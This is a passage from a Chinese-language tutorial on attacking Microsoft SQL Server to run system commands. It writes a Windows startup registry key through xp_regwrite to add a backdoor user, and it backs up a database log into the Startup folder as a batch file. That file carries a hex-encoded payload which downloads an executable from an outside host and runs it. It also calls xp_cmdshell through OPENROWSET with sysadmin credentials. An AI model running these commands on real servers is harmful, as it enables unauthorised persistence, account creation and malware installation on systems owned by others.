二、写任意文件执行命令

    利用xp_regwrite写注册表项，直接把要执行的命令写入RUN启动项。

    EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','C:\windows\system32\cmd.exe /c net user ray ray /add'

    备份日志到启动项

    我们可以开启一个数据库的完全恢复模式，然后新建个表，插入要备份进日志的命令，最后把日志备份成批处理文件到用户启动文件夹，机器重新启动后就会运行这个文件。

    alter database msdb set RECOVERY FULL--
    create table cmd (a image)--
    backup log msdb to disk = 'c:\cmd1' with init--
    insert into cmd (a) values     (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A740D0A)--
    backup log ISTO to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat'--
drop table cmd--

    三、任意权限用户执行命令

    在任意权限的服务器角色下，我们只要知道服务器的SYSADMIN角色的帐户和密码就能利用OPENROWSET宏执行命令

    select * from OPENROWSET('SQLoledb','uid=sa;pwd=admin;Address=127.0.0.1,7788;','set fmtonly off exec master..xp_cmdshell ''dir c:\''')